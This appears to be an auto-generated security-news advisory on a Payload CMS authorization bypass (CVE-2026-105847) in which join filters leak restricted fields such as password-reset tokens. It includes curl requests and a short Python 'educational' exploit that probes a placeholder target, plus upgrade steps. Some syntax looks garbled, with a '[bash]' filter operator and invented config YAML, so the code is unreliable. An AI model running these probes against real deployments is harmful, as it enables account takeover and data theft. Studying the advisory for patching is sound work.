Payload CMS, Information Disclosure / Authorization Bypass, CVE-2026-105847 (High) -DC-Oct2026-2774

Listen to this Post

CVE-2026-105847 is a high-severity information disclosure vulnerability in Payload CMS, a free and open-source headless content management system. The flaw affects versions from 3.0.0 before 3.90.0 and canary versions before 4.0.0-canary.34. The vulnerability stems from improper implementation of access control mechanisms when handling polymorphic joins within the query interface. In Payload CMS, collections often maintain relationships with other data entities through foreign keys or join tables. When these relationships are defined as polymorphic, a single field can reference multiple different collection types. The underlying database queries must strictly enforce row-level security and field-level permissions for every referenced entity. However, in the affected versions, the query engine fails to adequately restrict access when constructing joins that traverse into sensitive fields of related collections. The technical root cause lies in how polymorphic join filters are processed during data retrieval operations. An authenticated user with permission to query a primary collection can construct specific filter parameters that trigger database joins against secondary or tertiary tables containing highly sensitive information. Because the system does not sufficiently validate whether the requesting user has explicit read access to every field involved in the joined result set, it returns aggregated data that includes fields which should have been hidden due to role-based restrictions. This bypasses the intended security boundaries established by the application’s permission model, effectively allowing lower-privileged users to infer or directly extract values protected from standard queries. The operational impact is severe, primarily categorized as unauthorized information disclosure leading to potential credential compromise and privacy violations. Attackers can exploit this flaw to read-restricted fields such as password-reset tokens, session secrets, API keys, or personally identifiable information stored in related collections. The extraction of password-reset tokens is particularly dangerous as it enables account takeover attacks without requiring brute force techniques or phishing. By observing the presence or absence of specific data patterns in join results, an attacker can also perform inference attacks to deduce the existence and content of restricted records, thereby gaining a comprehensive map of the system’s sensitive data structure even if direct access is partially blocked. This vulnerability aligns with CWE-862 (Missing Authorization) and CWE-209 (Information Exposure Through Error Messages). The attack vector is network-based with low complexity, requiring only authenticated access to the CMS interface or API, making it a significant risk for any deployment where multiple user roles interact with shared content collections.

DailyCVE Form:

Platform: Payload CMS
Version: >= 3.0.0, < 3.90.0
Vulnerability : Information Disclosure
Severity: High
date: 2026-09-18

Prediction: 2026-10-06 (Patched)

(end of form)

What Undercode Say:

Check Payload CMS version
npm list payload
Query collection with polymorphic join (vulnerable pattern)
curl -X GET "https://target.com/api/posts?where[category.slug][bash]=secret" \
-H "Authorization: Bearer <user_token>"
Infer hidden fields via filter response
curl -X GET "https://target.com/api/posts?where[author.passwordResetToken][bash]=true" \
-H "Authorization: Bearer <user_token>"
Test patched version behavior
curl -X GET "https://target.com/api/posts?where[author.passwordResetToken][bash]=true" \
-H "Authorization: Bearer <user_token>" \
-w "\nHTTP Status: %{http_code}\n"
// Vulnerable query construction in Payload CMS
const posts = await payload.find({
collection: 'posts',
where: {
'author.secretField': { equals: 'value' }
},
user: lowPrivilegeUser
});
// Returns data from restricted fields in joined collection

Exploit: (Educational Purposes!)

import requests
TARGET = "https://target-payload-instance.com"
TOKEN = "low_privilege_user_token"
def infer_hidden_field(collection, join_field, target_field):
"""Infer existence of hidden field via polymorphic join filter"""
url = f"{TARGET}/api/{collection}"
params = {
f"where[{join_field}.{target_field}][bash]": "true"
}
headers = {"Authorization": f"Bearer {TOKEN}"}
response = requests.get(url, params=params, headers=headers)
return response.status_code == 200 and len(response.json().get("docs", [])) > 0
Test for password reset token exposure
if infer_hidden_field("posts", "author", "passwordResetToken"):
print("[+] Hidden field exists - password reset tokens may be exposed")
print("[+] Account takeover possible via token extraction")
else:
print("[-] Field not accessible or patched")

Protection: from this CVE

Upgrade to patched version
npm install [email protected]
Or for canary users
npm install [email protected]
Verify patched version
npm list payload | grep -E "3.90.0|4.0.0-canary.34"
Restrict read access to sensitive collections (temporary workaround)
In Payload collection config:
access: {
read: ({ req: { user } }) => user?.role === 'admin'
}
Example Payload collection access control (post-patch best practice)
collections:
Posts:
access:
read:
- role: admin
- role: editor
fields:
- name: author
type: relationship
relationTo: Users
Ensure joined fields respect read permissions

Impact:

Successful exploitation allows an authenticated attacker with low privileges to infer or directly extract hidden and read-restricted field values from related collections. This includes password-reset tokens, session secrets, API keys, and personally identifiable information. The exposure of password-reset tokens enables account takeover attacks without brute force or phishing. Attackers can also perform inference attacks to map sensitive data structures, even when direct access is partially blocked. The vulnerability bypasses role-based access controls, compromising the integrity of the permission model and exposing sensitive data to unauthorized users.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top